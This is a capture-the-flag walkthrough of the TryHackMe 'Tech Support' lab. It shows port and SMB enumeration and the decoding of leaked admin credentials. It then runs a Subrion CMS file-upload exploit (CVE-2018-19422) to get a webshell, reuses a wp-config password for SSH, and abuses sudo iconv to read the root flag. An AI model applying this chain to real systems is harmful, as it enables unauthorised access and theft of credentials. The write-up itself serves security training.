Challenge Link - https://tryhackme.com/room/techsupp0rt1
Initial Enumeration and Web Shell
We can start the initial enumeration by running a port scan using nmap to scan open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ nmap -sC -sV -oN nmap/initial 10.10.59.1 Nmap scan report for 10.10.59.1 Host is up (0.19s latency). Not shown: 996 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 10:8a:f5:72:d7:f9:7e:14:a5:c5:4f:9e:97:8b:3d:58 (RSA) | 256 7f:10:f5:57:41:3c:71:db:b5:5b:db:75:c9:76:30:5c (ECDSA) |_ 256 6b:4c:23:50:6f:36:00:7c:a6:7c:11:73:c1:a8:60:0c (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) Service Info: Host: TECHSUPPORT; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-time: | date: 2022-05-16T17:28:34 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: techsupport | NetBIOS computer name: TECHSUPPORT\x00 | Domain name: \x00 | FQDN: techsupport |_ System time: 2022-05-21T22:58:36+05:30 |_clock-skew: mean: -1h49m59s, deviation: 3h10m29s, median: 0s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed May 16 22:58:43 2022 -- 1 IP address (1 host up) scanned in 47.35 seconds
We have a SSH server running on port 22, Apache httpd server running on port 80 and Samba smbd running on port 139 and 445.
Let's start by enumerating the port 80 first. Nmap scan shows that it is running the Apache2 Ubuntu Default Page. Let's open our web browser and check it out.
Next, we can run a gobuster scan to look for hidden files and directories.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ gobuster dir -u http://10.10.59.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.59.1 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /wordpress (Status: 301) [Size: 312] [--> http://10.10.59.1/wordpress/] /test (Status: 301) [Size: 307] [--> http://10.10.59.1/test/] =============================================================== Finished ===============================================================
We got two directories, I enumerated both of them but there is nothing useful for us. This is a rabbit hole, just don't fall for this.
Next we can enumerate the SMB server and check if there is any share that we can read or write.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ smbclient -L 10.10.59.1 Password for [WORKGROUP\madhav]: Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers websvr Disk IPC$ IPC IPC Service (TechSupport server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP
We got a share named
websvr. Let's try connecting to it.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ smbclient //10.10.59.1/websvr Password for [WORKGROUP\madhav]: Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat May 29 12:47:38 2021 .. D 0 Sat May 29 12:33:47 2021 enter.txt N 273 Sat May 29 12:47:38 2021 8460484 blocks of size 1024. 5698836 blocks available smb: \> get enter.txt getting file \enter.txt of size 273 as enter.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec) smb: \> exit
We got a file named
enter.txt. Inside the file, there are some credentials (which are encoded) and reference to a directory named
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ cat enter.txt GOALS ===== 1)Make fake popup and host it online on Digital Ocean server 2)Fix subrion site, /subrion doesn't work, edit from panel 3)Edit wordpress website IMP === Subrion creds |->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula] Wordpress creds |->
First of all, we need to decrypt the password. For this we can use CyberChef. This is a very easy encryption, it can be directly solved using CyberChef's magic function.
We got the password! If you try to access the
/subrion directory, the page does not load properly. But we can access the
/subrion/panel directory. This contains a login page, and we can login using the credentials we got earlier.
For those who don't know about subrion, it is an open source CMS based on PHP and MySQL. There are many exploits available publicly for this CMS including the exploit for Authenticated File Upload vulnerability.
We can use this exploit to get a reverse shell on the target machine.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ python3 49876.py -u http://10.10.59.1/subrion/panel/ -l admin -p Scam2021 [+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 [+] Trying to connect to: http://10.10.59.1/subrion/panel/ [+] Success! [+] Got CSRF token: maQYr48N6TYYj96VUyXQnHJLa10YDXfBBE7C66Tk [+] Trying to log in... [+] Login Successful! [+] Generating random name for Webshell... [+] Generated webshell name: gbbogvvwtgreihg [+] Trying to Upload Webshell.. [+] Upload Success... Webshell path: http://10.10.59.1/subrion/panel/uploads/gbbogvvwtgreihg.phar $ id uid=33(www-data) gid=33(www-data) groups=33(www-data)
You can also get this reverse shell manually, by uploading a php-reverse-shell with a
.phar extension to
/subrion/panel/uploads and then you can execute the reverse shell.
Now we have an initial shell on the target machine. Our next task is to elevate our privileges and finally get a root shell on the machine. To escalate our privileges, I started enumerating the web directories, and I found a password in the
$ cat /var/www/html/wordpress/wp-config.php
We can use this password to login as user
scamsite (can be found from /etc/passwd) using SSH.
┌──(madhav㉿kali)-[~/ctf/thm/techSupport] └─$ ssh email@example.com The authenticity of host '10.10.59.1 (10.10.59.1)' can't be established. ED25519 key fingerprint is SHA256:J/HR9GKX4ReRvs4I9fnMwmJrOTL5B3skZ4owxwxWoyM. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.59.1' (ED25519) to the list of known hosts. firstname.lastname@example.org's password: Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 120 packages can be updated. 88 updates are security updates. Last login: Fri May 28 23:30:20 2021 scamsite@TechSupport:~$
Now, if we run the
sudo -l command, we can see that the user scamsite can run the
/usr/bin/iconv command as user root.
scamsite@TechSupport:~$ sudo -l Matching Defaults entries for scamsite on TechSupport: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User scamsite may run the following commands on TechSupport: (ALL) NOPASSWD: /usr/bin/iconv
iconv is a tool in linux which can be used to convert text from one encoding to another. You can read more about this tool from the linux man page. For GTFOBins, I found out that we can exploit the special permission given to this tool to read our root flag.
We can do this by the following command:
camsite@TechSupport:~$ sudo iconv -f 8859_1 -t 8859_1 "/root/root.txt" **************************************** -
The challenge is now complete. We managed to read the root flag! That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Alfrey Davilla | vaneltia.